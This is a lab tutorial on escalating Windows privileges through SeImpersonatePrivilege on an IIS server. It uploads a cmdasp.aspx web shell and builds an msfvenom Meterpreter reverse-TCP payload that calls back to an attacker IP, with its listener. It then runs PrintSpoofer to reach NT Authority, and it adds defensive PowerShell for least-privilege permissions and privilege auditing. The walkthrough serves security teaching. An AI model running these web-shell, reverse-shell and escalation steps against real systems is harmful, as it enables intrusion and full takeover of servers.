
Windows Privilege Escalation: SeImpersonatePrivilege

In this article on Windows Privilege Escalation via SeImpersonatePrivilege, we will be showcasing the process of creating a lab environment on an IIS Server running on a Windows Server 2019 machine. After setting up the IIS server, we will be focusing on the usage of the SeImpersonatePrivilege, or “Impersonate a Client After Authentication” user right, to elevate access on the machine using different methods.

Table of Contents

  • Introduction
  • Lab Setup
    • IIS Installation
    • Adding the Upload Functionality
    • Changing Permissions
  • Exploitation of IIS Server
  • Elevating Privileges using PrintSpoofer
  • Conclusion

Introduction

Microsoft introduced the SeImpersonatePrivilege (Impersonate a Client after Authentication) in Windows 2000 SP4. The system assigns this privilege to users who are members of the device’s local Administrators group and to the device’s local service account. Apart from these users and groups, the following components also hold this user right: services started by the Service Control Manager, and Component Object Model (COM) servers started by the COM infrastructure. Now that we know which types of users have the SeImpersonatePrivilege, it is time to understand what the privilege grants. A user holding the SeImpersonatePrivilege is permitted to run programs on behalf of a client, and that ability is exactly what the privilege escalation scenarios in this article build on.

Now that we have a basic understanding of the SeImpersonatePrivilege, let’s dive into the lab setup. We will discuss the privilege further as we proceed.

Lab Setup

As we learned from the Introduction, this kind of privilege is assigned to users that are local administrators or have similar roles. So, to replicate the vulnerability, we will be using Windows Server 2019 with AD. As Microsoft has patched the vulnerabilities, we will be using Build 17763, as shown in the image below.

systeminfo

IIS Installation

We will be getting the particular privilege by installing the IIS server on our machine. To configure the IIS server, we will need to open the Server Manager and Choose the Add roles and features from the QuickStart Menu as shown in the image below.

This will open an Installation Wizard. We move through the Before You Begin section without making any changes. Next we are presented with the Installation Type section, where we choose the Role-based or feature-based installation option.

Again, we breeze through the Server Selection section, as it will differ for each user depending on the name you gave to your server and its forest. We then get to the Server Roles section. Here, we have the option to choose the Web Server (IIS) role, as demonstrated below.

Configuring IIS Features and Completing Installation

Pressing the next button will lead us to the Features Section. Here, we have to make sure that we have some dependencies that are required for the IIS to function properly. It includes .NET Framework 4.7; chances are it will be installed by default. But other than that we need to install the ASP .NET 4.7 and under the WCF Services, we have the HTTP Activation and the TCP Port Sharing. Again, if you have something that is already installed, it is fine to move on by clicking Next.

Now, we have the section that lists the Role Services we want to install. Some will be selected automatically; apart from those, we will be selecting the Web Server and its components, namely the Common HTTP Features, Health and Diagnostics, Performance and Security components, as shown in the image below.

At last, we have the Confirmation Section. Here, we can verify all the services and components that we want to install. You can move on to the installation by clicking the Install button.

The installation process will run for a little while, after which the IIS service is installed. We can view the IIS Welcome Page by accessing the IP address of the server through a web browser of your choice. In case you run into an issue, try restarting the IIS service or the server itself.

Adding the Upload Functionality

Similar to the /var/www/html from the Linux HTTP server, we have the equivalent inside the inetpub/wwwroot location. It will have the welcome page that we viewed on the Web Browser Earlier. At this stage, we want to add the Upload Functionality onto our IIS Server. To do this, we created some web pages and scripts. We won’t be explaining those in detail over here. But, in case you want to add those on your deployment, download the files from our GitHub Repository and Extract those files inside the wwwroot directory in such a way that it replicates the image shown below.

To access CS.aspx on our IIS Server, we will be editing the iisstart HTML page. Upon opening the file for the first time, you will see some comments and the official Microsoft links. We removed that content and added the static address of our server followed by the name of the aspx file. This makes our CS.aspx webpage accessible when we click on the Welcome Page, which used to redirect to the Microsoft home page. We are doing this to make our application easily accessible.

Changing Permissions

The process of adding web pages with the upload functionality doesn’t end here; we need to change the permissions so that we can access the webpage and upload files. To change the permissions, we open the IIS Manager. Here, on the right-hand side menu, we have the Edit Permissions option, as highlighted in the image.

This will open the wwwroot Directory Permissions. Here, we are allowing the Users of the Domain Full Control with the Modify access of the wwwroot directory. However, there exists a more secure way of doing this by making a dedicated user for the management of the IIS Server and adding the restricted permissions for that particular user. However, in the interest of time and convenience, we are applying permission for all users.
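The Server Manager wizard steps above can be scripted, and the permission step can be done the more restrictive way the text mentions instead of granting every domain user Full Control. The following is an added example, not from the original article; it assumes the default site root C:\inetpub\wwwroot, an Uploads subfolder used by the upload page, and the default application pool identity "IIS APPPOOL\DefaultAppPool".

```powershell
# Added example: scripted equivalent of the Add Roles and Features wizard, followed by a
# least-privilege ACL for the upload folder. Run in an elevated PowerShell on the server.
Import-Module ServerManager

$features = @(
    'Web-Server',                 # Web Server (IIS) role
    'Web-Common-Http',            # Common HTTP Features
    'Web-Health',                 # Health and Diagnostics
    'Web-Performance',            # Performance
    'Web-Security',               # Security
    'Web-Asp-Net45',              # ASP.NET 4.x (runs the .aspx upload page)
    'NET-Framework-45-Core',      # .NET Framework 4.x core
    'NET-WCF-HTTP-Activation45',  # WCF Services > HTTP Activation
    'NET-WCF-TCP-PortSharing45'   # WCF Services > TCP Port Sharing
)

$result = Install-WindowsFeature -Name $features -IncludeManagementTools
if (-not $result.Success) { throw "IIS feature installation failed (exit code $($result.ExitCode))" }
if ($result.RestartNeeded -eq 'Yes') { Write-Warning 'A reboot is required before IIS will work.' }

# Least-privilege permissions: only the Uploads folder becomes writable, and only for the
# identity the site actually runs as. Nothing else under wwwroot is touched, so the rest of
# the site stays read-only for the worker process.
$webRoot   = 'C:\inetpub\wwwroot'                 # assumption: default site root
$uploadDir = Join-Path $webRoot 'Uploads'
$appPoolId = 'IIS APPPOOL\DefaultAppPool'         # assumption: the site uses DefaultAppPool
New-Item -ItemType Directory -Path $uploadDir -Force | Out-Null

# (OI)(CI)M = Modify, inherited by files and subfolders, granted to the app pool identity only.
icacls $uploadDir /grant "$($appPoolId):(OI)(CI)M" | Out-Null

# Verify: show the resulting ACL and confirm the site answers on the loopback address.
icacls $uploadDir
Restart-Service W3SVC
(Invoke-WebRequest -UseBasicParsing -Uri 'http://localhost/').StatusCode   # expect 200
```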

Exploiting IIS Server

Now we have the IIS Server up and running. We must mention that in case your IIS Server is not working as expected, try restarting the IIS service or the server itself. To exploit the IIS Server, we will use the file upload functionality we added. Moving on to our attacker machine, i.e., the Kali machine: it is set up on the same network so that the IIS service can be reached through a web browser on Kali. We browse to the file upload page and upload the ASPX command shell that is located at /usr/share/webshells/aspx/cmdasp.aspx, as shown in the image below.

Clicking on the Upload button, we will have the file successfully uploaded. This is just a demonstration; real-life scenarios will have additional security and steps involved before uploading a shell.

The scripts that provide the upload functionality are written so that uploaded files are placed inside the Uploads directory. So, we can access the uploaded shell by browsing to /Uploads/cmdasp.aspx, as shown in the image. Here we have a field that can be used to run commands on the target machine. We demonstrated this by running the net user command.

Gaining Meterpreter Shell and Enumerating Privileges

Now that we have confirmed that we can upload a shell and execute commands, it’s time to exploit the system and gain a meterpreter session on the target machine. This means that we will need to create a payload using msfvenom or any other tool of your choice. We are naming our payload shell.exe.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=1234 -f exe > shell.exe

After successfully creating the payload, we upload it in the same way as we did with the aspx shell earlier. We can see that the executable payload has been successfully uploaded to the target machine.

Now to generate the meterpreter shell, we will need to execute the payload as well. Hence, we will use the aspx shell to browse the path of the uploaded executable shell.exe file as shown in the image below.

Before executing the payload, we will need to create a listener that will catch the meterpreter reverse shell generated by the payload. We will need to provide the same configuration that we used while crafting the payload with msfvenom. Next, we run the payload on the machine using the aspx shell and receive the meterpreter session. Since we are focusing on privileges in this piece, we ran the getprivs command to list the privileges that are enabled on the target machine. We can see that the privilege in question, SeImpersonatePrivilege, is enabled on the target machine.

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
set lport 1234
exploit
getprivs

You don’t need to rely on the meterpreter shell’s getprivs command, though. The enabled privileges can also be checked with the whoami command and its /priv option, as shown in the image below. We can see that the session we gained through exploitation runs as the user iisapppool.

shell
whoami /priv
whoami
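From a defender’s side, the same check is worth automating: which privileges the current token holds, and which principals the local security policy grants SeImpersonatePrivilege to (by default Administrators, SERVICE, LOCAL SERVICE and NETWORK SERVICE, which is why service-style identities such as the IIS worker process end up with it). The following is an added example, not from the original article; it assumes an elevated PowerShell session for the secedit export and a temporary file under $env:TEMP.

```powershell
# Added example: audit SeImpersonatePrivilege on a Windows host.
# Part 1 parses the current token's privileges (the same data `whoami /priv` prints above).
# Part 2 reads the machine's user-right assignment via `secedit /export` and resolves the SIDs.

function Get-TokenPrivilegeState {
    # Parses lines such as:
    #   SeImpersonatePrivilege   Impersonate a client after authentication   Enabled
    param([string[]]$Lines = (whoami /priv))
    $state = @{}
    foreach ($line in $Lines) {
        if ($line -match '^(Se\w+Privilege)\s+.+?\s+(Enabled|Disabled)\s*$') {
            $state[$Matches[1]] = $Matches[2]
        }
    }
    return $state
}

function Get-UserRightHolders {
    # Returns the principals assigned a user right in local security policy.
    param([string]$Right = 'SeImpersonatePrivilege')
    $cfg = Join-Path $env:TEMP 'secpol-export.inf'    # assumption: writable temp location
    secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    $line = Get-Content $cfg | Where-Object { $_ -match "^$Right\s*=" }
    Remove-Item $cfg -ErrorAction SilentlyContinue
    if (-not $line) { return @() }
    # Right-hand side looks like: *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20
    ($line -split '=', 2)[1].Split(',') | ForEach-Object {
        $entry = $_.Trim().TrimStart('*')               # SIDs are prefixed with '*'
        try   { ([System.Security.Principal.SecurityIdentifier]$entry).Translate([System.Security.Principal.NTAccount]).Value }
        catch { $entry }                                  # plain names or unresolvable SIDs pass through
    }
}

$token = Get-TokenPrivilegeState
if ($token.ContainsKey('SeImpersonatePrivilege')) {
    Write-Output "Current token holds SeImpersonatePrivilege ($($token['SeImpersonatePrivilege']))"
} else {
    Write-Output 'Current token does not hold SeImpersonatePrivilege'
}

Write-Output 'Principals granted SeImpersonatePrivilege by local policy:'
Get-UserRightHolders | ForEach-Object { "  $_" }
```

Any entry beyond the four defaults, or a web-facing worker process whose token shows the right as Enabled, is the condition this article goes on to exploit and is worth reviewing.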

Elevating Privileges using PrintSpoofer

One of the key tools abused in the wild to exploit the privilege we are discussing is called PrintSpoofer. You can get the source code and the ready-to-deploy executable from GitHub. Interestingly, this tool is relatively new; however, the technique it uses to elevate access is quite old. To fully understand how this tool exploits the SeImpersonatePrivilege, we will now look more closely at the access that this privilege provides.

As we discussed in the introduction, this privilege allows users to create a process with another user’s access. Therefore, PrintSpoofer exploits it to elevate access to the NT Authority level. In the demonstration provided below, we first move into the Public directory because it has the required write permissions for uploading the PrintSpoofer executable. Then, after uploading the executable, we move to the command shell on the target machine. After listing the contents, we can confirm that the transfer of the PrintSpoofer executable was successful.

Using the PrintSpoofer exploit is quite straightforward. You need two parameters: -i to request an interactive session and -c to specify the command to run once exploitation succeeds. When we run this command on the target machine, it checks for the SeImpersonatePrivilege and for a named pipe. After successfully completing these checks, it proceeds with the creation of the process specified by the -c option using the NT Authority token. Finally, we observe that a new command shell instance is spawned. When we run the whoami command, it shows that we have successfully achieved privilege escalation through the SeImpersonatePrivilege.

PrintSpoofer64.exe -i -c cmd
whoami

Conclusion

During the research process, it became apparent that although many guides exist to use various tools to exploit the SeImpersonatePrivilege on the machine, there isn’t a single resource that shows how to set these privileges in the first place. Therefore, I hope that this article will help you grasp the concept of Windows Privilege Escalation using SeImpersonatePrivilege. It will also explain the methodology behind the exploitation of SeImpersonatePrivilege.

Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. Contact on LinkedIn